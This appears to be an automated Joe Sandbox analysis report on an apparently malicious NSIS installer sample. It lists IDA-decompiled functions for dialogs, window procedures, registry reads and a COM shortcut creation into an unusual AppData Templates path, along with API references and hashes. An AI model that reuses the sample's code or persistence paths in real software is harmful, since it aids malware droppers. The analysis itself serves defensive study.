                                                            0x00401c6a
                                                            0x00401c6e
                                                            0x00401c70
                                                            0x00401cc5
                                                            0x00401cc7
                                                            0x00401cd0
                                                            0x00401cd8
                                                            0x00401cdb
                                                            0x00401cdb
                                                            0x00401ce4
                                                            0x00000000
                                                            0x00401c72
                                                            0x00401c79
                                                            0x00401c7b
                                                            0x00401c7e
                                                            0x00401c84
                                                            0x00401c8b
                                                            0x00401c8e
                                                            0x00401cb6
                                                            0x00401cea
                                                            0x00401cea
                                                            0x00401c90
                                                            0x00401c9e
                                                            0x00401ca6
                                                            0x00401ca9
                                                            0x00401ca9
                                                            0x00401c8e
                                                            0x00401ced
                                                            0x00401cf0
                                                            0x00401cf6
                                                            0x00402a42
                                                            0x00402a42
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                            • SendMessageA.USER32 ref: 00401CB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: a2a89bb8462c7151f84b5e8a0709187cefd4722cf5762b3f674c81304cb6edd9
                                                            • Instruction ID: fb252943c263502b915e172e451356f37a414cf8932e3a565ad31ae7147df210
                                                            • Opcode Fuzzy Hash: a2a89bb8462c7151f84b5e8a0709187cefd4722cf5762b3f674c81304cb6edd9
                                                            • Instruction Fuzzy Hash: E2217371948208BEEB059FB5DA86AAD7FB4EF45304F10447EF101B61D1D7B989819B18
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402EA8 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00402EA8(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x432048 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x45242c) {
							_t3 = CreateDialogParamA( *0x452420, 0x6f, 0, E00402E25, 0);
							 *0x432048 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040669F(0);
					}
				} else {
					_t6 =  *0x432048;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x432048 = 0;
					return _t6;
				}
			}






                                                            0x00402eaf
                                                            0x00402ecf
                                                            0x00402ed9
                                                            0x00402ee5
                                                            0x00402ef6
                                                            0x00402eff
                                                            0x00000000
                                                            0x00402f04
                                                            0x00402f0b
                                                            0x00402ed1
                                                            0x00402ed8
                                                            0x00402ed8
                                                            0x00402eb1
                                                            0x00402eb1
                                                            0x00402eb8
                                                            0x00402ebb
                                                            0x00402ebb
                                                            0x00402ec1
                                                            0x00402ec8
                                                            0x00402ec8

                                                            APIs
                                                            • DestroyWindow.USER32 ref: 00402EBB
                                                            • GetTickCount.KERNEL32(00000000,00403086,00000001,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402ED9
                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402E25,00000000), ref: 00402EF6
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F04
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                            • String ID:
                                                            • API String ID: 2102729457-0
                                                            • Opcode ID: 215ea6209036c334194e630b3a6d8c331bd9e7ebc391d59cacfd35bfdff6c725
                                                            • Instruction ID: f2601d1978d4935414455477ceead43ade8f8f36080c659767c01e9f51b987ab
                                                            • Opcode Fuzzy Hash: 215ea6209036c334194e630b3a6d8c331bd9e7ebc391d59cacfd35bfdff6c725
                                                            • Instruction Fuzzy Hash: 12F05E31441A20ABC6216B60FF8C99B7B74A705B12B21583AF105B11F6C6B84889CBEC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C31E71 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E73C31E71(intOrPtr _a4, CHAR* _a8) {
				intOrPtr _t11;
				intOrPtr _t19;
				CHAR* _t21;

				_t11 = _a4;
				if( *((intOrPtr*)(_t11 + 4)) != 1) {
					_t21 = _a8;
					_t13 =  ==  ? 0x73c340c4 : 0x73c340bc;
					lstrcpyA(_t21,  ==  ? 0x73c340c4 : 0x73c340bc);
				} else {
					_t19 =  *((intOrPtr*)(_t11 + 0x1498));
					if(( *(_t11 + 0x810) & 0x00000100) != 0) {
						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x80c)) + 1));
					}
					_t21 = _a8;
					wsprintfA(_t21, "callback%d", _t19);
				}
				return _t21;
			}






                                                            0x73c31e71
                                                            0x73c31e7c
                                                            0x73c31eaf
                                                            0x73c31ebf
                                                            0x73c31ec4
                                                            0x73c31e7e
                                                            0x73c31e88
                                                            0x73c31e8e
                                                            0x73c31e96
                                                            0x73c31e96
                                                            0x73c31e99
                                                            0x73c31ea4
                                                            0x73c31eaa
                                                            0x73c31ecd

                                                            APIs
                                                            • wsprintfA.USER32 ref: 73C31EA4
                                                            • lstrcpyA.KERNEL32(?,error,00000818,73C316E5,00000000,?), ref: 73C31EC4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrcpywsprintf
                                                            • String ID: callback%d$error
                                                            • API String ID: 2408954437-1307476583
                                                            • Opcode ID: a9ea8882235cdac14b0ad8db72a42db29e875cfad6f896bfb94419d908b2102e
                                                            • Instruction ID: 51b039f76c78158c9a71feb0c7501ba25f7d8857f160eb3ae127195c4db30470
                                                            • Opcode Fuzzy Hash: a9ea8882235cdac14b0ad8db72a42db29e875cfad6f896bfb94419d908b2102e
                                                            • Instruction Fuzzy Hash: A7F034313051209FC705EB059948BAA73EAEF86300F4984A8F84ADF241C771AC008B96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402173 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 74%
                                                            			E00402173() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402C39(0xfffffff0);
				 *(_t111 - 0xc) = E00402C39(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402C39(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402C39(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402C39(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C56( *(_t111 - 0xc)) == 0) {
					E00402C39(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x2000) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                            0x0040217c
                                                            0x00402186
                                                            0x00402190
                                                            0x0040219d
                                                            0x004021a8
                                                            0x004021ab
                                                            0x004021c5
                                                            0x004021cb
                                                            0x004021d1
                                                            0x004021d4
                                                            0x004021de
                                                            0x004021e2
                                                            0x004021e2
                                                            0x004021e7
                                                            0x004021f8
                                                            0x00402200
                                                            0x004022dc
                                                            0x004022dc
                                                            0x004022e3
                                                            0x00402206
                                                            0x00402206
                                                            0x00402215
                                                            0x00402219
                                                            0x0040221c
                                                            0x00402222
                                                            0x00402230
                                                            0x00402233
                                                            0x00402235
                                                            0x00402240
                                                            0x00402240
                                                            0x00402245
                                                            0x00402247
                                                            0x0040224e
                                                            0x0040224e
                                                            0x00402251
                                                            0x0040225a
                                                            0x0040225d
                                                            0x00402262
                                                            0x00402264
                                                            0x00402271
                                                            0x00402271
                                                            0x00402274
                                                            0x00402280
                                                            0x00402283
                                                            0x0040228c
                                                            0x00402292
                                                            0x00402299
                                                            0x004022b2
                                                            0x004022b4
                                                            0x004022c2
                                                            0x004022c2
                                                            0x004022b2
                                                            0x004022c5
                                                            0x004022cb
                                                            0x004022cb
                                                            0x004022ce
                                                            0x004022d4
                                                            0x004022da
                                                            0x004022ef
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004022da
                                                            0x004022e5
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?), ref: 004021F8
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00002000,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022AA
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes, xrefs: 00402238
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes
                                                            • API String ID: 123533781-4054825685
                                                            • Opcode ID: 3072e84b25b1ac51e710694b0bc78824abca27b46eb7a976ecb31f121939248b
                                                            • Instruction ID: de46d6ec528c0b0c8935217740d64446ab711007b8cbb855df2cc617b58c6e92
                                                            • Opcode Fuzzy Hash: 3072e84b25b1ac51e710694b0bc78824abca27b46eb7a976ecb31f121939248b
                                                            • Instruction Fuzzy Hash: 37511675A00208BFDF10DFE4C988A9D7BB6AF48314F2045AAF505EB2D1DA799981CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405CD7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E00405CD7(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00406257(0x446098, _a4);
				_t21 = E00405C82(0x446098);
				if(_t21 != 0) {
					E00406535(_t21);
					if(( *0x452438 & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x446098;
						while(1) {
							_t11 = lstrlenA(0x446098);
							_push(0x446098);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E004065CE();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405C30(0x446098);
								continue;
							} else {
								goto L1;
							}
						}
						E00405BE9();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                            0x00405ce3
                                                            0x00405cee
                                                            0x00405cf2
                                                            0x00405cf9
                                                            0x00405d05
                                                            0x00405d11
                                                            0x00405d11
                                                            0x00405d29
                                                            0x00405d2a
                                                            0x00405d31
                                                            0x00405d32
                                                            0x00000000
                                                            0x00000000
                                                            0x00405d15
                                                            0x00405d1c
                                                            0x00405d24
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405d1c
                                                            0x00405d34
                                                            0x00000000
                                                            0x00405d48
                                                            0x00405d07
                                                            0x00405d0b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405d0b
                                                            0x00405cf4
                                                            0x00000000

                                                            APIs
                                                              • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000B,0000000B,00002000,00403556,0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00406264
                                                              • Part of subcall function 00405C82: CharNextA.USER32(?), ref: 00405C90
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                            • lstrlenA.KERNEL32(00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000,0047B000), ref: 00405D2A
                                                            • GetFileAttributesA.KERNEL32(00446098,00446098,00446098,00446098,00446098,00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000), ref: 00405D3A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                            • String ID: T'Wu
                                                            • API String ID: 3248276644-2377931180
                                                            • Opcode ID: d5ae26ad5e185ccb9d41ab4008376a2a7eec6025898b03740fa4c655be68b4f9
                                                            • Instruction ID: ca67251d285f136759c69e236b036a1895e73ffa9f1d75b438997b26ec9dd8f6
                                                            • Opcode Fuzzy Hash: d5ae26ad5e185ccb9d41ab4008376a2a7eec6025898b03740fa4c655be68b4f9
                                                            • Instruction Fuzzy Hash: 12F02825108F6526E72632391D09AAF0A45CE93324719453FFCA2B62C2DA3C89429E6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004052EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 89%
                                                            			E004052EC(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x43c07c != _t16) {
							_push(_t16);
							_push(6);
							 *0x43c07c = _t16;
							E00404CA7();
						}
						L11:
						return CallWindowProcA( *0x43c084, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404C27(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404320(0x413);
				return 0;
			}





                                                            0x004052f0
                                                            0x004052fa
                                                            0x00405316
                                                            0x00405338
                                                            0x0040533b
                                                            0x00405341
                                                            0x0040534b
                                                            0x0040534c
                                                            0x0040534e
                                                            0x00405354
                                                            0x00405354
                                                            0x0040535e
                                                            0x00000000
                                                            0x0040536c
                                                            0x00405323
                                                            0x0040535b
                                                            0x0040535b
                                                            0x00000000
                                                            0x0040535b
                                                            0x0040532f
                                                            0x00405331
                                                            0x00000000
                                                            0x00405331
                                                            0x00405300
                                                            0x00000000
                                                            0x00000000
                                                            0x00405307
                                                            0x00000000

                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0040531B
                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 0040536C
                                                              • Part of subcall function 00404320: SendMessageA.USER32 ref: 00404332
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: 55b41b329312dcc7f374a5f01e52e89ce4d23385b54215be366866303fde3b52
                                                            • Instruction ID: 1a66df526f819bcac04dd73860a054bf484f2535563b1484c434c9e94afb1d49
                                                            • Opcode Fuzzy Hash: 55b41b329312dcc7f374a5f01e52e89ce4d23385b54215be366866303fde3b52
                                                            • Instruction Fuzzy Hash: 34017C72104608EBEF206F61ED91AAB372AEB84395F145037FE05751D0C7BA8D929F29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040613E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 90%
                                                            			E0040613E(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x2000;
				_t21 = E004060DD(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x1fff] = _t30[0x1fff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                            0x0040614c
                                                            0x0040614e
                                                            0x00406166
                                                            0x0040616b
                                                            0x00406170
                                                            0x004061ad
                                                            0x004061ad
                                                            0x00406172
                                                            0x00406184
